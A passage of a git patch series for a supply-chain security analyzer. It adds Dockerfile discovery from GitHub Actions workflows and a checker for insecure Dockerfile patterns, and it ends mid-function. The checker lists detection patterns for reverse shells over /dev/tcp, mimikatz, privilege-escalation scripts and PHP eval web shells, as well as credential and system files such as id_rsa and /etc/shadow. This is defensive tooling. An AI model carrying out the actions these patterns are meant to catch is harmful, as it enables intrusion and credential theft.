From 07dbd0a37bdb9d2bdb6259f3a94488fbc87badc1 Mon Sep 17 00:00:00 2001
From: Achraf Maghous
Date: Wed, 25 Jun 2025 11:48:30 +0100
Subject: [PATCH 1/3] feat: add Dockerfile analysis for build command detection

Changes:
- Add find_dockerfile_from_job, which locates the Dockerfile referenced by a
  workflow job in both kinds of workflow steps: 'run' and 'uses'.
- Add a simple DockerNode class; for now it mainly stores the Dockerfile path
  retrieved from the workflow.
- Parse Dockerfiles with dockerfile-parse and their RUN instruction commands
  with bashparser.py.
- Parse and store the build commands found in Dockerfiles.

Signed-off-by: Achraf Maghous
---
 pyproject.toml                                |   2 +
 .../checks/build_script_check.py              |  35 +++
 .../ci_service/base_ci_service.py             |  18 ++
 .../ci_service/github_actions/analyzer.py     | 282 +++++++++++++++++-
 .../github_actions/github_actions_ci.py       |  50 +++-
 5 files changed, 374 insertions(+), 13 deletions(-)

diff --git a/pyproject.toml b/pyproject.toml
index 74705364b..ce77300f3 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -38,6 +38,7 @@ dependencies = [
     "problog >= 2.2.6,<3.0.0",
     "cryptography >=44.0.0,<45.0.0",
     "semgrep == 1.113.0",
+    "dockerfile-parse >= 2.0.1",
 ]
 keywords = []
 # https://pypi.org/classifiers/
@@ -79,6 +80,7 @@ dev = [
     "pylint >=3.0.3,<4.0.0",
     "cyclonedx-bom >=4.0.0,<5.0.0",
     "types-beautifulsoup4 >= 4.12.0,<5.0.0",
+    "types-dockerfile-parse >= 2.0.0",
 ]
 docs = [
     "sphinx >=8.0.0,<9.0.0",
diff --git a/src/macaron/slsa_analyzer/checks/build_script_check.py b/src/macaron/slsa_analyzer/checks/build_script_check.py
index ccd61cca1..ebfcd62b3 100644
--- a/src/macaron/slsa_analyzer/checks/build_script_check.py
+++ b/src/macaron/slsa_analyzer/checks/build_script_check.py
@@ -107,12 +107,15 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData:
         # we parse bash scripts that are reachable through CI only.
         result_tables: list[CheckFacts] = []
         ci_services = ctx.dynamic_data["ci_services"]
+
         for tool in build_tools:
             for ci_info in ci_services:
                 ci_service: BaseCIService = ci_info["service"]
                 # Checking if a CI service is discovered for this repo.
                 if isinstance(ci_service, NoneCIService):
                     continue
+
+                # Process regular workflow build commands.
                 try:
                     for build_command in ci_service.get_build_tool_commands(
                         callgraph=ci_info["callgraph"], build_tool=tool
@@ -148,6 +151,38 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData:
                 except CallGraphError as error:
                     logger.debug(error)
 
+                # Process Docker build commands if the CI service provides them.
+                if hasattr(ci_service, "get_docker_build_commands"):
+                    try:
+                        for build_command in ci_service.get_docker_build_commands(
+                            callgraph=ci_info["callgraph"], build_tool=tool
+                        ):
+                            logger.debug("Processing Docker build command %s", build_command)
+                            # For a Dockerfile, link to the Dockerfile itself.
+                            relative_path = os.path.relpath(
+                                build_command["ci_path"], ctx.component.repository.fs_path
+                            )
+                            trigger_link = ci_service.api_client.get_file_link(
+                                ctx.component.repository.full_name,
+                                ctx.component.repository.commit_sha,
+                                relative_path,
+                            )
+                            logger.debug("Trigger link for Docker build command: %s", trigger_link)
+
+                            result_tables.append(
+                                BuildScriptFacts(
+                                    build_tool_name=tool.name,
+                                    ci_service_name=ci_service.name,
+                                    build_trigger=trigger_link,
+                                    language=build_command["language"],
+                                    language_distributions=None,
+                                    language_versions=None,
+                                    language_url=None,
+                                    build_tool_command=tool.serialize_to_json(build_command["command"]),
+                                    confidence=Confidence.HIGH,
+                                )
+                            )
+                    except CallGraphError as error:
+                        logger.debug(error)
+
         return CheckResultData(result_tables=result_tables, result_type=CheckResultType.PASSED)
diff --git a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py
index adaa3ce95..a6372c189 100644
--- a/src/macaron/slsa_analyzer/ci_service/base_ci_service.py
+++ b/src/macaron/slsa_analyzer/ci_service/base_ci_service.py
@@ -280,6 +280,24 @@ def get_third_party_configurations(self) -> list[str]:
         """
         return []
 
+    def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]:
+        """
+        Traverse the callgraph and find all the reachable Docker build commands.
+
+        Parameters
+        ----------
+        callgraph: CallGraph
+            The callgraph reachable from the CI workflows.
+        build_tool: BaseBuildTool
+            The build tool whose commands are being searched for.
+
+        Yields
+        ------
+        BuildToolCommand
+            The object that contains the Docker build command as well as useful contextual information.
+        """
+        # By default we assume that there is no Docker build command available for a CI service.
+        # Each CI service should override this method if Docker build commands can be detected for it.
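+        #
+        # A sketch of the expected consumption pattern for overrides of this
+        # method (hypothetical usage; it mirrors build_script_check.py above):
+        #
+        #     for cmd in ci_service.get_docker_build_commands(callgraph, tool):
+        #         cmd["command"]  # the Docker build command
+        #         cmd["ci_path"]  # the Dockerfile the command came from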
+        raise CallGraphError("There is no Docker build command for this CI service.")
+
 
 class NoneCIService(BaseCIService):
     """This class can be used to initialize an empty CI service."""
diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py
index 4565c2098..16b9afaad 100644
--- a/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py
+++ b/src/macaron/slsa_analyzer/ci_service/github_actions/analyzer.py
@@ -11,6 +11,8 @@
 from enum import Enum
 from typing import Any, TypeGuard, cast
 
+from dockerfile_parse import DockerfileParser
+
 from macaron.code_analyzer.call_graph import BaseNode
 from macaron.config.global_config import global_config
 from macaron.errors import CallGraphError, GitHubActionsValueError, ParseError
@@ -23,6 +25,7 @@
     Job,
     NormalJob,
     ReusableWorkflowCallJob,
+    RunStep,
     Step,
     Workflow,
     is_action_step,
@@ -120,6 +123,39 @@ def __str__(self) -> str:
         return f"GitHubJobNode({self.name})"
 
 
+class DockerNode(BaseNode):
+    """This class represents a callgraph node for when a Dockerfile is used as a build tool."""
+
+    def __init__(
+        self,
+        caller: BaseNode,
+        dockerfile_path: str,
+        node_id: str | None = None,
+    ) -> None:
+        """Initialize instance.
+
+        Parameters
+        ----------
+        caller : BaseNode
+            The caller node.
+        dockerfile_path : str
+            The path to the Dockerfile.
+        node_id : str | None
+            The unique identifier of a node in the callgraph.
+        """
+        super().__init__(
+            caller=caller,
+            node_id=node_id,
+        )
+        self.dockerfile_path = dockerfile_path
+        # Register this node in the caller's callee list if not already present.
+        if caller and self not in caller.callee:
+            caller.add_callee(self)
+            logger.debug("DockerNode created and added to the caller's callee list.")
+
+
 def is_parsed_obj_workflow(
     parsed_obj: Workflow | Identified[ReusableWorkflowCallJob] | ActionStep,
 ) -> TypeGuard[Workflow]:
@@ -277,16 +313,117 @@ def find_language_setup_action(job_node: GitHubJobNode, lang_name: BuildLanguage
     return None
 
 
-def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None:
-    """Analyze the GitHub Actions node to build the call graph.
+def find_dockerfile_from_job(job_node: GitHubJobNode, repo_path: str) -> str | None:
+    """
+    Find the Dockerfile used in a GitHub Actions job.
 
     Parameters
     ----------
-    node : GitHubWorkflowNode
-        The node for a single GitHub Actions workflow.
+    job_node: GitHubJobNode
+        The target GitHub Actions job node.
     repo_path: str
-        The file system path to the repo.
+        The path to the target repository.
+
+    Returns
+    -------
+    str | None
+        The path to the Dockerfile or None if not found.
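+
+    Notes
+    -----
+    As an illustration (hypothetical workflow content): a step such as
+    ``run: docker build -f docker/Dockerfile .`` resolves to
+    ``<repo_path>/docker/Dockerfile``, and a ``docker/build-push-action``
+    step with ``file: ci/Dockerfile`` resolves to ``<repo_path>/ci/Dockerfile``.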
""" + logger.info("Finding Dockerfile in job node: %s", job_node.name) + # Get steps directly from the job node's parsed object + steps = job_node.parsed_obj.obj.get("steps", []) + if isinstance(steps, list): + for step in steps: + # Handle 'run' steps with docker build command + if not is_action_step(step) and "run" in step: + run_cmd = step["run"] + if "docker build" in run_cmd: + # Extract --file or -f argument + match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd) + if match: + dockerfile_path = match.group(1) + # Check if the Dockerfile path is absolute or relative + logger.debug("dockerfile_path in run step: %s", dockerfile_path) + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + # Default to 'Dockerfile' in the build context + context_match = re.search(r"docker build\s+([^\s]+)", run_cmd) + context_path = context_match.group(1) if context_match else "." + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + return dockerfile_path + + # Handle 'uses' steps with docker-related actions + if "uses" in step: + uses_action = step["uses"] + # Check for docker/build-push-action or similar + if any( + docker_action in uses_action + for docker_action in [ + "docker/build-push-action", + "docker/setup-buildx-action", + "docker-build-push", # Variations I found the most common + ] + ): + # Check if there's a 'with' section + if "with" in step: + with_section = step["with"] + + # Check for 'file' parameter (Dockerfile path) + if "file" in with_section: + dockerfile_path = with_section["file"] + return ( + os.path.join(repo_path, dockerfile_path) + if not os.path.isabs(dockerfile_path) + else dockerfile_path + ) + + # Check for 'context' parameter (might have Dockerfile in that directory) + if "context" in with_section and "file" not in with_section: + context_path = with_section["context"] + # Default to Dockerfile in the context directory + dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile") + if os.path.exists(dockerfile_path): + return dockerfile_path + + # If no file specified, check for default Dockerfile + default_dockerfile = os.path.join(repo_path, "Dockerfile") + if os.path.exists(default_dockerfile): + logger.debug("Using default Dockerfile location") + return default_dockerfile + + return None + + +def parse_run_commands(dockerfile_path: str) -> list[str]: + """Parse the RUN commands from a Dockerfile. + + Parameters + ---------- + dockerfile_path: str + The path to the Dockerfile. + + Returns + ------- + list[str] + A list of RUN commands found in the Dockerfile. + """ + try: + run_cmds = [] + with open(dockerfile_path, encoding="utf-8") as dockerfile: + dfp = DockerfileParser(fileobj=dockerfile) + for instruction in dfp.structure: + if instruction["instruction"] == "RUN": + run_cmds.append(instruction["value"]) + return run_cmds + except Exception as error: + raise CallGraphError(f"Error parsing Dockerfile at {dockerfile_path}: {error}") from error + + +def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None: + """Analyze the GitHub Actions node to build the call graph.""" if not is_parsed_obj_workflow(node.parsed_obj): return jobs = node.parsed_obj["jobs"] @@ -296,13 +433,102 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None node.add_callee(job_node) if is_normal_job(job): - # Add third-party workflows. 
-            steps = job.get("steps")
-            if steps is None:
+            # Process steps.
+            steps = job_node.parsed_obj.obj.get("steps")
+            if not isinstance(steps, list):
                 continue
-            for step in steps:
+
+            for step_idx, step in enumerate(steps):
+                # First check if this step uses Docker.
+                dockerfile_path = None
+                step_id = step.get("id", f"step_{step_idx}")
+
+                # Check for Docker usage in this specific step.
+                if "run" in step:
+                    run_cmd = step["run"]
+                    if "docker build" in run_cmd:
+                        # Extract the Dockerfile path from the docker build command.
+                        match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd)
+                        if match:
+                            dockerfile_path = match.group(1)
+                            dockerfile_path = (
+                                os.path.join(repo_path, dockerfile_path)
+                                if not os.path.isabs(dockerfile_path)
+                                else dockerfile_path
+                            )
+                        else:
+                            # Default to 'Dockerfile' in the build context.
+                            context_match = re.search(r"docker build\s+([^\s]+)", run_cmd)
+                            context_path = context_match.group(1) if context_match else "."
+                            dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile")
+
+                elif "uses" in step:
+                    uses_action = step["uses"]
+                    # Check for Docker-related actions.
+                    if any(
+                        docker_action in uses_action
+                        for docker_action in [
+                            "docker/build-push-action",
+                            "docker/setup-buildx-action",
+                            "docker-build-push",
+                        ]
+                    ):
+                        if "with" in step:
+                            with_section = step["with"]
+                            if isinstance(with_section, dict) and "file" in with_section:
+                                dockerfile_path = str(with_section["file"])
+                                dockerfile_path = (
+                                    os.path.join(repo_path, dockerfile_path)
+                                    if not os.path.isabs(dockerfile_path)
+                                    else dockerfile_path
+                                )
+
+                # If we found a Dockerfile, process it.
+                if dockerfile_path:
+                    # Create a DockerNode for this step. The constructor also
+                    # registers the node in the caller's callee list.
+                    docker_node = DockerNode(
+                        node_id=f"{job_name}_{step_id}_docker",
+                        caller=job_node,
+                        dockerfile_path=dockerfile_path,
+                    )
+                    logger.debug("Created DockerNode with id: %s", docker_node.node_id)
+
+                    # Parse the RUN commands from the Dockerfile.
+                    try:
+                        run_cmds = parse_run_commands(dockerfile_path)
+                        logger.debug("RUN commands found in Dockerfile %s: %s", dockerfile_path, run_cmds)
+
+                        for run_idx, run_cmd in enumerate(run_cmds):
+                            try:
+                                # Create a minimal step AST that contains the run command.
+                                docker_step_ast = RunStep(run=run_cmd)
+
+                                docker_bash_node = create_bash_node(
+                                    name="Dockerfile-RUN",
+                                    node_id=f"{job_name}_{step_id}_docker_run_{run_idx}",
+                                    node_type=BashScriptType.INLINE,
+                                    source_path=dockerfile_path,
+                                    ci_step_ast=docker_step_ast,
+                                    repo_path=repo_path,
+                                    caller=docker_node,
+                                    recursion_depth=0,
+                                )
+                                docker_node.add_callee(docker_bash_node)
+                            except CallGraphError as error:
+                                logger.error("Error creating BashNode for Dockerfile RUN command: %s", error)
+                    except CallGraphError as error:
+                        logger.error("Error parsing Dockerfile at %s: %s", dockerfile_path, error)
+
+                # Now handle the regular step processing.
                 if is_action_step(step):
-                    # TODO: change source_path for external workflows.
+                    # External 'uses' action; Docker-related 'uses' steps were
+                    # already handled at the top of the step loop.
                     action_name = step["uses"]
                     external_node = GitHubWorkflowNode(
                         name=action_name,
@@ -340,11 +566,41 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None
                         caller=job_node,
                         recursion_depth=0,
                     )
+                    job_node.add_callee(callee)
+                    # Note: 'docker build' run steps were already detected and
+                    # turned into DockerNodes at the top of the step loop, so
+                    # they are not re-processed here.
                 except CallGraphError as error:
                     logger.debug(error)
                     continue
-                job_node.add_callee(callee)
-
         elif is_reusable_workflow_call_job(job):
             workflow_call_job_with_id = Identified[ReusableWorkflowCallJob](job_name, job)
             # Add reusable workflows.
@@ -360,6 +616,8 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None
             reusable_node.model = create_third_party_action_model(reusable_node)
             job_node.add_callee(reusable_node)
 
 
 def build_call_graph_from_path(root: BaseNode, workflow_path: str, repo_path: str, macaron_path: str = "") -> BaseNode:
     """Build the call Graph for GitHub Actions workflows.
diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py
index 43c4e3f0e..f3cfb5b08 100644
--- a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py
+++ b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py
@@ -1,4 +1,4 @@
-# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved.
+# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved.
 # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.
 
 """This module analyzes GitHub Actions CI."""
@@ -18,6 +18,7 @@
 from macaron.slsa_analyzer.build_tool.base_build_tool import BaseBuildTool, BuildToolCommand
 from macaron.slsa_analyzer.ci_service.base_ci_service import BaseCIService
 from macaron.slsa_analyzer.ci_service.github_actions.analyzer import (
+    DockerNode,
     GitHubJobNode,
     GitHubWorkflowNode,
     GitHubWorkflowType,
@@ -706,3 +707,50 @@ def get_third_party_configurations(self) -> list[str]:
             The list of third-party CI configuration files
         """
         return self.third_party_configurations
+
+    def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]:
+        """Traverse the callgraph and find all Docker RUN commands that use build tools.
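+
+        For example (hypothetical Dockerfile content), a ``RUN mvn package``
+        instruction in a Dockerfile reachable from a workflow is yielded as a
+        build command when ``build_tool`` is Maven.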
+ + Parameters + ---------- + callgraph: CallGraph + The callgraph reachable from the CI workflows. + build_tool: BaseBuildTool + The corresponding build tool for which shell commands need to be detected. + + Yields + ------ + BuildToolCommand + The object that contains the build command from Dockerfile RUN instructions. + """ + for node in callgraph.bfs(): + # Look for DockerNode instances + if isinstance(node, DockerNode) and hasattr(node, "dockerfile_path"): + dockerfile_path = node.dockerfile_path + + # Find the parent workflow for context + workflow_node = None + parent = node.caller + while parent: + if isinstance(parent, GitHubWorkflowNode): + workflow_node = parent + break + parent = parent.caller if hasattr(parent, "caller") else None + + # Check all BashNode children of this DockerNode + for child in node.callee: + if isinstance(child, BashNode): + # Check each command in the bash node + for cmd in child.parsed_bash_obj.get("commands", []): + if build_tool.is_build_command(cmd): + yield BuildToolCommand( + ci_path=dockerfile_path, + command=cmd, + step_node=child, + language=build_tool.language, + language_versions=None, + language_distributions=None, + language_url=None, + reachable_secrets=[], + events=get_ci_events(workflow_node) if workflow_node else [], + ) From 3456d3cf1a5e871e3d24bc7a7555c2f03b3889fa Mon Sep 17 00:00:00 2001 From: Achraf Maghous Date: Wed, 2 Jul 2025 15:21:19 +0100 Subject: [PATCH 2/3] feat: add dockerfile checker for insecure patterns Changes: -Created security analyzer for Dockerfile following current available literature emphasizing: Use of outdated or insecure base images (FROM) Running containers as root (USER) Copying sensitive files into the image (COPY, ADD) Exposing insecure ports (EXPOSE) Environment variable leaks (ENV) Mounting unsafe host directories (VOLUME) Use of potentially dangerous shell commands (RUN) Signed-off-by: Achraf Maghous --- .../insecure_patterns_dockerfile_check.py | 616 ++++++++++++++++++ 1 file changed, 616 insertions(+) create mode 100644 src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py diff --git a/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..aa6710792 --- /dev/null +++ b/src/macaron/slsa_analyzer/checks/insecure_patterns_dockerfile_check.py @@ -0,0 +1,616 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
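+
+# A compact illustration of the patterns this module flags (hypothetical
+# Dockerfile, shown for documentation only):
+#
+#   FROM ubuntu:latest              # unpinned/outdated base image (FROM)
+#   USER root                       # container runs as root (USER)
+#   EXPOSE 22                       # risky port, SSH (EXPOSE)
+#   ENV DB_PASSWORD=secret          # sensitive environment variable (ENV)
+#   VOLUME /var/run/docker.sock     # unsafe host mount (VOLUME)
+#   ADD https://example.com/x /x    # download via ADD (ADD)
+#   COPY id_rsa /root/.ssh/         # security-critical file copy (COPY)
+#   RUN chmod 777 /tmp              # dangerous shell command (RUN)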
+ +"""This module contains the DockerfileSecurityCheck class with security analysis based on DFScan research.""" + +import json +import logging +import os +import re +from io import StringIO + +from dockerfile_parse import DockerfileParser +from sqlalchemy import ForeignKey, Integer, String +from sqlalchemy.orm import Mapped, mapped_column + +from macaron.database.db_custom_types import DBJsonDict +from macaron.database.table_definitions import CheckFacts +from macaron.json_tools import JsonType +from macaron.slsa_analyzer.analyze_context import AnalyzeContext +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType +from macaron.slsa_analyzer.registry import registry +from macaron.slsa_analyzer.slsa_req import ReqName + +logger: logging.Logger = logging.getLogger(__name__) + + +class DockerfileSecurityFacts(CheckFacts): + """The ORM mapping for justifications in dockerfile security check.""" + + __tablename__ = "_dockerfile_security_check" + + #: The primary key. + id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 + + #: The name of the base image used in the Dockerfile. + base_image_name: Mapped[str] = mapped_column(String, nullable=False, info={"justification": JustificationType.TEXT}) + + #: The version of the base image used in the Dockerfile. + base_image_version: Mapped[str] = mapped_column( + String, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security vulnerabilities found in the Dockerfile. + security_issues: Mapped[dict[str, JsonType]] = mapped_column( + DBJsonDict, nullable=False, info={"justification": JustificationType.TEXT} + ) + + #: Security risk score (0-100, higher is more risky). + risk_score: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT}) + + #: Number of security issues found. 
+    issues_count: Mapped[int] = mapped_column(Integer, nullable=False, info={"justification": JustificationType.TEXT})
+
+    __mapper_args__ = {
+        "polymorphic_identity": "dockerfile_security_check",
+    }
+
+
+class DockerfileSecurityAnalyzer:
+    """Security analyzer for Dockerfiles based on DFScan research."""
+
+    # Security rules derived from DFScan research.
+    RISKY_PORTS = [21, 22, 23, 3306]
+    PRIVILEGED_PORTS = list(range(1, 1024))
+    SAFE_PRIVILEGED_PORTS = [80, 443]
+
+    SENSITIVE_ENV_KEYWORDS = ["pass", "pswd", "license", "token", "session", "key", "authorized", "secret"]
+
+    # Allows CJK characters in the local part, following DFScan.
+    EMAIL_REGEX = re.compile(r"[A-Za-z0-9\u4e00-\u9fa5]+@[a-zA-Z0-9_-]+(\.[a-zA-Z0-9_-]+)+")
+
+    UNSAFE_VOLUMES = [
+        "/proc",
+        "/",
+        "/root/.ssh",
+        "/var/run/docker.sock",
+        "/var/lib/docker",
+        "/etc/docker",
+        "docker.service",
+        "docker.socket",
+        "/etc/default/docker",
+        "/etc/docker/daemon.json",
+        "/etc/sysconfig/docker",
+        "/usr/bin/containerd",
+        "/usr/sbin/runc",
+    ]
+
+    SENSITIVE_FILES = [
+        "NOTICE",
+        "README.md",
+        "LICENSE",
+        "AUTHORS.md",
+        "CONTRIBUTING.md",
+        ".vscode/",
+        "vendor/",
+        "env/",
+        "ENV/",
+        "build/",
+        "dist/",
+        "target/",
+        "downloads/",
+        "eggs/",
+        ".eggs/",
+        "lib/",
+        "lib64/",
+        "parts/",
+        "sdist/",
+        "var/",
+        "Dockerfile",
+        ".git",
+        ".editorconfig",
+        "*.egg-info/",
+        ".installed.cfg",
+        "*.egg",
+        "*.manifest",
+        "*.spec",
+        ".gcloudignore",
+        ".gitignore",
+        ".tox/",
+        ".dockerignore",
+        ".coverage",
+        ".coverage.*",
+        ".cache",
+        "htmlcov/",
+        "nosetests.xml",
+        "coverage.xml",
+        "*,cover",
+        ".hypothesis/",
+        "ssh/",
+        "id_rsa",
+        ".git-credentials",
+        "config.*",
+    ]
+
+    SECURITY_CRITICAL_FILES = [
+        "id_rsa",
+        "id_rsa.pub",
+        ".ssh",
+        "shadow",
+        "/etc/passwd",
+        "/etc/group",
+        "/etc/profile",
+        ".bash_history",
+        ".history",
+        ".log",
+        ".conf",
+    ]
+
+    MALICIOUS_RUN_PATTERNS = [
+        r">&/dev/tcp/",
+        r"&>/dev/tcp",
+        r"crontab",
+        r"LinEnum\.sh",
+        r"mimikatz",
+        r"@eval\(\$_POST",
+        r"@eval\(\$_GET",
+        r"@eval\(\$_REQUEST",
+        r"chmod 777",
+    ]
+
+    def __init__(self) -> None:
+        """Initialize the analyzer."""
+        self.issues: list[dict[str, str]] = []
+        self.risk_score: int = 0
+
+    def analyze_dockerfile_content(self, dockerfile_content: str) -> tuple[list[dict[str, str]], int, str, str]:
+        """
+        Analyze Dockerfile content for security issues.
+ + Parameters + ---------- + dockerfile_content : str + Content of the Dockerfile as string + + Returns + ------- + tuple[list[dict[str, str]], int, str, str] + tuple of (issues_list, risk_score, base_image_name, base_image_version) + """ + self.issues = [] + self.risk_score = 0 + + base_image_name = "unknown" + base_image_version = "unknown" + + try: + # Use dockerfile-parse with fileobj argument + dockerfile_fileobj = StringIO(dockerfile_content) + parser = DockerfileParser(fileobj=dockerfile_fileobj) + + # Extract base image info + base_image_name, base_image_version = self._get_base_image_info(parser) + + # Parse the structure + structure = parser.structure + + for item in structure: + instruction_type = item.get("instruction", "").upper() + instruction_value = item.get("value", "") + + if instruction_type == "FROM": + self._check_from_instruction(instruction_value) + elif instruction_type == "USER": + self._check_user_instruction(instruction_value) + elif instruction_type == "EXPOSE": + self._check_expose_instruction(instruction_value) + elif instruction_type == "ENV": + self._check_env_instruction(instruction_value) + elif instruction_type == "VOLUME": + self._check_volume_instruction(instruction_value) + elif instruction_type == "COPY": + self._check_copy_instruction(instruction_value) + elif instruction_type == "ADD": + self._check_add_instruction(instruction_value) + elif instruction_type == "RUN": + self._check_run_instruction(instruction_value) + + except json.JSONDecodeError as e: + logger.error("Error parsing Dockerfile: %s", e) + self._add_issue("ERROR", "PARSE", f"Failed to parse Dockerfile: {str(e)}", 5) + + return self.issues, self.risk_score, base_image_name, base_image_version + + def _get_base_image_info(self, parser: DockerfileParser) -> tuple[str, str]: + """ + Extract base image name and version from DockerfileParser. 
+ + Parameters + ---------- + parser : DockerfileParser + The dockerfile parser instance + + Returns + ------- + tuple[str, str] + tuple of (image_name, image_version) + """ + try: + # Get the base image + base_image = parser.baseimage + if base_image: + # Split image name and tag + if ":" in base_image: + image_name, image_version = base_image.split(":", 1) + else: + image_name = base_image + image_version = "latest" + return image_name, image_version + + except AttributeError as e: + logger.debug("Error extracting base image info: %s", e) + + return "unknown", "unknown" + + def _add_issue(self, severity: str, instruction: str, issue: str, risk_points: int = 0) -> None: + """Add a security issue to the results.""" + self.issues.append( + {"severity": severity, "instruction": instruction, "issue": issue, "risk_points": str(risk_points)} + ) + self.risk_score += risk_points + + def _check_from_instruction(self, content: str) -> None: + """Check FROM instruction for security issues.""" + # Extract image name and tag + image_parts = content.split(":") + image_name = image_parts[0] + tag = image_parts[1] if len(image_parts) > 1 else "latest" + + # Check for latest tag usage + if tag == "latest" or len(image_parts) == 1: + self._add_issue( + "MEDIUM", "FROM", f"Using 'latest' tag or no tag specified for base image: {image_name}", 15 + ) + + # Check for old base image (simplified - would need Docker Hub API integration) + self._check_base_image_age(image_name, tag) + + def _check_base_image_age(self, image_name: str, tag: str) -> None: + """Check if base image is too old (simplified implementation).""" + try: + # This would require Docker Hub API integration + # For now, just warn about common old tags + old_patterns = ["ubuntu:14.04", "ubuntu:16.04", "centos:6", "centos:7", "python:2.7"] + full_image = f"{image_name}:{tag}" + + for old_pattern in old_patterns: + if old_pattern in full_image: + self._add_issue("HIGH", "FROM", f"Using potentially outdated base image: {full_image}", 25) + break + except AttributeError as e: + logger.debug("Error checking base image age: %s", e) + + def _check_user_instruction(self, content: str) -> None: + """Check USER instruction for root usage.""" + if content.strip().lower() in {"root", "0"}: + self._add_issue("HIGH", "USER", "Running container as root user poses security risks", 30) + + def _check_expose_instruction(self, content: str) -> None: + """Check EXPOSE instruction for risky ports.""" + try: + # Handle both space-separated and single port formats + port_strings = content.split() + ports: list[int] = [] + + for port_str in port_strings: + # Handle port ranges and protocols (e.g., "8080/tcp") + port_str = port_str.split("/")[0] # Remove protocol if present + if "-" in port_str: + # Handle port ranges + start_port, end_port = port_str.split("-") + ports.extend(range(int(start_port), int(end_port) + 1)) + else: + ports.append(int(port_str)) + + for port in ports: + if port in self.RISKY_PORTS: + self._add_issue("HIGH", "EXPOSE", f"Exposing risky port {port} (SSH/FTP/MySQL/Telnet)", 25) + elif port in self.PRIVILEGED_PORTS and port not in self.SAFE_PRIVILEGED_PORTS: + self._add_issue("MEDIUM", "EXPOSE", f"Exposing privileged port {port}", 15) + except (ValueError, AttributeError) as e: + logger.debug("Could not parse ports from EXPOSE instruction: %s", e) + + def _check_env_instruction(self, content: str) -> None: + """Check ENV instruction for sensitive information.""" + # Check for sensitive keywords + content_lower = content.lower() + for keyword in 
self.SENSITIVE_ENV_KEYWORDS: + if keyword.lower() in content_lower: + self._add_issue( + "HIGH", "ENV", f"Potentially sensitive information in environment variable: {keyword}", 20 + ) + + # Check for email addresses + if self.EMAIL_REGEX.search(content): + self._add_issue("MEDIUM", "ENV", "Email address found in environment variable", 10) + + def _check_volume_instruction(self, content: str) -> None: + """Check VOLUME instruction for unsafe mounts.""" + # Parse volume instruction - can be JSON array or space-separated + volumes = [] + + if content.strip().startswith("["): + # JSON array format + try: + volumes = json.loads(content) + except json.JSONDecodeError: + # Fallback to string parsing + volumes = [v.strip().strip("\"'") for v in content.strip("[]").split(",")] + else: + # Space-separated format + volumes = [v.strip().strip("\"'") for v in content.split()] + + for volume in volumes: + for unsafe_vol in self.UNSAFE_VOLUMES: + if volume == unsafe_vol or volume.startswith(unsafe_vol): + self._add_issue("CRITICAL", "VOLUME", f"Unsafe volume mount detected: {volume}", 40) + + def _check_copy_instruction(self, content: str) -> None: + """Check COPY instruction for sensitive files.""" + # Parse COPY instruction arguments + parts = content.split() + if not parts: + return + + # COPY can have multiple sources, last argument is destination + sources = parts[:-1] if len(parts) > 1 else parts + + for source in sources: + # Check for wildcard usage + if source == ".": + self._add_issue( + "MEDIUM", "COPY", "Using '.' as source copies entire build context including sensitive files", 15 + ) + + # Check for sensitive files + self._check_file_sensitivity("COPY", source) + + def _check_add_instruction(self, content: str) -> None: + """Check ADD instruction for security issues.""" + parts = content.split() + if not parts: + return + + # ADD can have multiple sources, last argument is destination + sources = parts[:-1] if len(parts) > 1 else parts + + for source in sources: + # Check for URL usage + if source.startswith(("http://", "https://", "ftp://")): + self._add_issue("HIGH", "ADD", f"ADD instruction downloading from URL: {source}", 25) + + # Check for compressed files + if any(source.endswith(ext) for ext in [".tar", ".tar.gz", ".tgz", ".zip"]): + self._add_issue("MEDIUM", "ADD", f"ADD instruction with compressed file: {source}", 15) + + # Same checks as COPY + if source == ".": + self._add_issue( + "MEDIUM", "ADD", "Using '.' 
